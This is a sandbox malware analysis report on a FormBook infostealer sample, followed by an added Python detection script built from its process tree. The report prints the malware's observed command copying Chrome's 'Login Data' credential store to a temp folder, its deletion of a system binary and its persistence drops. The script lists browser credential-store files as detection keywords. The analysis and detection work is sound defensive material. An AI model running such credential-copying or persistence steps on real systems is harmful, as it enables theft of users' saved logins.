Source: 00000005.00000000.275130208.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000000.275130208.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.275130208.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001D.00000002.773383896.0000000001020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000001D.00000002.773383896.0000000001020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001D.00000002.773383896.0000000001020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000000.393025016.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000000.393025016.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000000.393025016.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.274615202.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000000.274615202.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.274615202.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001D.00000002.766540425.0000000000940000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000001D.00000002.766540425.0000000000940000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001D.00000002.766540425.0000000000940000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: TR0627729920002.exe PID: 5932, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: cmd.exe PID: 564, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: Jwjxmakrv.exe PID: 2460, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: rundll32.exe PID: 4684, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: C:\Users\Public\Libraries\vrkamxjwJ.url, type: DROPPED Matched rule: Methodology_Shortcut_HotKey author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, score = 27.09.2019, reference = https://twitter.com/cglyer/status/1176184798248919044
Source: C:\Users\Public\Libraries\vrkamxjwJ.url, type: DROPPED Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, score = 27.09.2019, reference = https://twitter.com/cglyer/status/1176184798248919044
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C9DBD2 5_2_03C9DBD2
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C0EBB0 5_2_03C0EBB0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03CA2B28 5_2_03CA2B28
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03CA22AE 5_2_03CA22AE
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BF4120 5_2_03BF4120
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BDF900 5_2_03BDF900
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03CA28EC 5_2_03CA28EC
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BEB090 5_2_03BEB090
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C020A0 5_2_03C020A0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03CA20A8 5_2_03CA20A8
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C91002 5_2_03C91002
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03CAE824 5_2_03CAE824
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03CA1FF1 5_2_03CA1FF1
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03CA2EF7 5_2_03CA2EF7
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BF6E30 5_2_03BF6E30
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C9D616 5_2_03C9D616
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03CA25DD 5_2_03CA25DD
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C02581 5_2_03C02581
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BED5E0 5_2_03BED5E0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BD0D20 5_2_03BD0D20
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03CA1D55 5_2_03CA1D55
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03CA2D07 5_2_03CA2D07
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BE841F 5_2_03BE841F
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C9D466 5_2_03C9D466
Source: C:\Windows\SysWOW64\cmd.exe Code function: String function: 03BDB150 appears 35 times
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C19A50 NtCreateFile,LdrInitializeThunk, 5_2_03C19A50
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C19A20 NtResumeThread,LdrInitializeThunk, 5_2_03C19A20
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C199A0 NtCreateSection,LdrInitializeThunk, 5_2_03C199A0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C19910 NtAdjustPrivilegesToken,LdrInitializeThunk, 5_2_03C19910
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C19840 NtDelayExecution,LdrInitializeThunk, 5_2_03C19840
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C19860 NtQuerySystemInformation,LdrInitializeThunk, 5_2_03C19860
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C19FE0 NtCreateMutant,LdrInitializeThunk, 5_2_03C19FE0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C19780 NtMapViewOfSection,LdrInitializeThunk, 5_2_03C19780
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C197A0 NtUnmapViewOfSection,LdrInitializeThunk, 5_2_03C197A0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C19710 NtQueryInformationToken,LdrInitializeThunk, 5_2_03C19710
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C196E0 NtFreeVirtualMemory,LdrInitializeThunk, 5_2_03C196E0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C195D0 NtClose,LdrInitializeThunk, 5_2_03C195D0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C19540 NtReadFile,LdrInitializeThunk, 5_2_03C19540
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C1A3B0 NtGetContextThread, 5_2_03C1A3B0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C19B00 NtSetValueKey, 5_2_03C19B00
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C19A80 NtOpenDirectoryObject, 5_2_03C19A80
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C19A00 NtProtectVirtualMemory, 5_2_03C19A00
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C19A10 NtQuerySection, 5_2_03C19A10
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C199D0 NtCreateProcessEx, 5_2_03C199D0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C19950 NtQueueApcThread, 5_2_03C19950
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C198F0 NtReadVirtualMemory, 5_2_03C198F0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C198A0 NtWriteVirtualMemory, 5_2_03C198A0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C1B040 NtSuspendThread, 5_2_03C1B040
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C19820 NtEnumerateKey, 5_2_03C19820
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C19760 NtOpenProcess, 5_2_03C19760
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C1A770 NtOpenThread, 5_2_03C1A770
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C19770 NtSetInformationFile, 5_2_03C19770
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C1A710 NtOpenProcessToken, 5_2_03C1A710
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C19730 NtQueryVirtualMemory, 5_2_03C19730
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C196D0 NtCreateKey, 5_2_03C196D0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C19650 NtQueryValueKey, 5_2_03C19650
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C19660 NtAllocateVirtualMemory, 5_2_03C19660
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C19670 NtQueryInformationProcess, 5_2_03C19670
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C19610 NtEnumerateValueKey, 5_2_03C19610
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C195F0 NtQueryInformationFile, 5_2_03C195F0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C19560 NtWriteFile, 5_2_03C19560
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C19520 NtWaitForSingleObject, 5_2_03C19520
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C1AD30 NtSetContextThread, 5_2_03C1AD30
Source: TR0627729920002.exe, 00000000.00000002.277070452.0000000002930000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilename0 vs TR0627729920002.exe
Source: TR0627729920002.exe, 00000000.00000002.278345155.000000007FCF5000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilename0 vs TR0627729920002.exe
Source: TR0627729920002.exe, 00000000.00000003.257799024.0000000003BE1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename0 vs TR0627729920002.exe
Source: TR0627729920002.exe, 00000000.00000002.277410487.00000000034A0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilename0 vs TR0627729920002.exe
Source: TR0627729920002.exe, 00000000.00000003.237403790.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilename0 vs TR0627729920002.exe
Source: TR0627729920002.exe, 00000000.00000003.237626468.000000007FC97000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilename0 vs TR0627729920002.exe
Source: TR0627729920002.exe, 00000000.00000002.279158959.000000007FE68000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilename0 vs TR0627729920002.exe
Source: TR0627729920002.exe, 00000000.00000003.239679096.00000000035D8000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilename0 vs TR0627729920002.exe
Source: TR0627729920002.exe, 00000000.00000003.239608511.0000000003544000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilename0 vs TR0627729920002.exe
Source: TR0627729920002.exe Binary or memory string: OriginalFilename0 vs TR0627729920002.exe
Source: TR0627729920002.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Jwjxmakrv.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: IconCachet0hh.exe.7.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: IconCachet0hh.exe.7.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: IconCachet0hh.exe.7.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: C:\Users\user\Desktop\TR0627729920002.exe Section loaded: system.dll Jump to behavior
Source: C:\Users\user\Desktop\TR0627729920002.exe Section loaded: system.dll Jump to behavior
Source: C:\Users\Public\Libraries\Jwjxmakrv.exe Section loaded: system.dll Jump to behavior
Source: C:\Users\Public\Libraries\Jwjxmakrv.exe Section loaded: system.dll Jump to behavior
Source: C:\Users\Public\Libraries\Jwjxmakrv.exe Section loaded: system.dll Jump to behavior
Source: C:\Users\Public\Libraries\Jwjxmakrv.exe Section loaded: system.dll Jump to behavior
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\P1bxx\IconCachet0hh.exe 3685495D051137B1C4EFDE22C26DF0883614B6453B762FA84588DA55ED2E7744
Source: TR0627729920002.exe ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\TR0627729920002.exe File read: C:\Users\user\Desktop\TR0627729920002.exe Jump to behavior
Source: C:\Users\user\Desktop\TR0627729920002.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\TR0627729920002.exe "C:\Users\user\Desktop\TR0627729920002.exe"
Source: C:\Users\user\Desktop\TR0627729920002.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: C:\Users\Public\Libraries\Jwjxmakrv.exe "C:\Users\Public\Libraries\Jwjxmakrv.exe"
Source: C:\Windows\explorer.exe Process created: C:\Users\Public\Libraries\Jwjxmakrv.exe "C:\Users\Public\Libraries\Jwjxmakrv.exe"
Source: C:\Users\Public\Libraries\Jwjxmakrv.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\Public\Libraries\Jwjxmakrv.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\cmd.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: C:\Program Files (x86)\P1bxx\IconCachet0hh.exe C:\Program Files (x86)\P1bxx\IconCachet0hh.exe
Source: C:\Program Files (x86)\P1bxx\IconCachet0hh.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\TR0627729920002.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\Public\Libraries\Jwjxmakrv.exe "C:\Users\Public\Libraries\Jwjxmakrv.exe" Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Program Files (x86)\P1bxx\IconCachet0hh.exe C:\Program Files (x86)\P1bxx\IconCachet0hh.exe Jump to behavior
Source: C:\Users\Public\Libraries\Jwjxmakrv.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k Jump to behavior
Source: C:\Users\Public\Libraries\Jwjxmakrv.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\cmd.exe"
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
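The process tree above is the part a detection engineer keys on: explorer.exe spawns an argument-less rundll32.exe (the hollowing host), that rundll32.exe drives cmd.exe to copy Chrome's "Login Data" to %TEMP%\DB1 and to delete the hollowed cmd.exe image, and explorer.exe launches the drop from C:\Users\Public\Libraries. The following is an added example and not part of this Joe Sandbox report: a Python triage over process-creation records constructed from the "Process created" lines above (the record layout and the rule names are assumptions) that flags each of those four patterns and stays quiet on the conhost.exe and cmd.exe /k noise.

```python
"""Process-creation triage for the FormBook process tree above.

Added example, not part of the Joe Sandbox report. EVENTS is constructed
from the report's "Process created" lines (parent image, child image,
command line); the record layout and the rule names are assumptions.
"""
import ntpath
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    parent: str   # image of the creating process
    image: str    # image of the created process
    cmdline: str  # command line as logged (may or may not repeat the image)


# Constructed from the report's process tree; not a real Sysmon/EDR export.
EVENTS = [
    ProcEvent(r"C:\Users\user\Desktop\TR0627729920002.exe",
              r"C:\Windows\SysWOW64\cmd.exe",
              r'"C:\Windows\System32\cmd.exe" /k'),
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Users\Public\Libraries\Jwjxmakrv.exe",
              r'"C:\Users\Public\Libraries\Jwjxmakrv.exe"'),
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\SysWOW64\rundll32.exe",
              r"C:\Windows\SysWOW64\rundll32.exe"),
    ProcEvent(r"C:\Windows\SysWOW64\rundll32.exe",
              r"C:\Windows\SysWOW64\cmd.exe",
              r'/c del "C:\Windows\SysWOW64\cmd.exe"'),
    ProcEvent(r"C:\Windows\SysWOW64\rundll32.exe",
              r"C:\Windows\SysWOW64\cmd.exe",
              r'/c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" '
              r'"C:\Users\user\AppData\Local\Temp\DB1" /V'),
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Program Files (x86)\P1bxx\IconCachet0hh.exe",
              r"C:\Program Files (x86)\P1bxx\IconCachet0hh.exe"),
    ProcEvent(r"C:\Windows\SysWOW64\cmd.exe",
              r"C:\Windows\System32\conhost.exe",
              r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
]

# Browser credential/cookie stores that stealers copy out before parsing
# (Chrome "Login Data", Firefox logins.json / key4.db / signons.sqlite).
CRED_STORES = ("login data", "logins.json", "key4.db", "signons.sqlite", "cookies")
# Directories a standard user can write to; explorer.exe launching an EXE
# from one of them is the report's Jwjxmakrv.exe case.
USER_WRITABLE = ("c:\\users\\public\\", "\\appdata\\local\\temp\\", "c:\\programdata\\")


def _base(path):
    return ntpath.basename(path.strip('"')).lower()


def command_args(ev):
    """Arguments of ev, with the leading image token stripped when the
    logged command line repeats it (quoted or bare)."""
    tail = ev.cmdline.strip()
    if not tail:
        return ""
    m = re.match(r'"([^"]*)"\s*(.*)|(\S+)\s*(.*)', tail, re.S)
    first, rest = (m.group(1), m.group(2)) if m.group(1) is not None else (m.group(3), m.group(4))
    return rest.strip() if _base(first) == _base(ev.image) else tail


def triage(events):
    """Return (rule_name, event) pairs for the FormBook behaviours seen in
    the report's process tree."""
    hits = []
    for ev in events:
        img, parent, args = _base(ev.image), _base(ev.parent), command_args(ev)
        low = args.lower()
        # A hollowing host: rundll32.exe does nothing useful without <dll>,<entry>.
        if img == "rundll32.exe" and not args:
            hits.append(("rundll32_without_dll_argument", ev))
        # Credential store copied to %TEMP% via cmd /c copy ... /V.
        if img == "cmd.exe" and re.search(r"\bcopy\b", low) and any(s in low for s in CRED_STORES):
            hits.append(("browser_credential_store_copied", ev))
        # The injected payload deleting its hollowed host image under \Windows\.
        if img == "cmd.exe" and re.search(r"\bdel\b", low) and "\\windows\\sys" in low:
            hits.append(("windows_binary_deleted", ev))
        # explorer.exe starting an EXE from a user-writable drop location.
        if parent == "explorer.exe" and any(d in ev.image.lower() for d in USER_WRITABLE):
            hits.append(("explorer_runs_user_writable_exe", ev))
    return hits


if __name__ == "__main__":
    for rule, ev in triage(EVENTS):
        print(f"{rule:34} {ev.image}  {ev.cmdline}")
```

On the constructed events the four rules fire once each; the cmd.exe /k children, conhost.exe and the Program Files (x86) launch of IconCachet0hh.exe are not flagged, because on their own they are not distinctive (the report ties IconCachet0hh.exe to the infection through its cmd.pdb string, not through its launch).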
Source: C:\Users\user\Desktop\TR0627729920002.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B091E540-83E3-11CF-A713-0020AFD79762}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\TR0627729920002.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\Jwjxmakrvkwfuijrnbpqlslhsyeopao[1] Jump to behavior
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\P1bxx Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winEXE@23/8@36/13
Source: C:\Users\user\Desktop\TR0627729920002.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\TR0627729920002.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Desktop\TR0627729920002.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\Public\Libraries\Jwjxmakrv.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\Public\Libraries\Jwjxmakrv.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\Public\Libraries\Jwjxmakrv.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\Public\Libraries\Jwjxmakrv.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3436:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4968:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5036:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5896:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5216:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5256:120:WilError_01
Source: C:\Users\user\Desktop\TR0627729920002.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
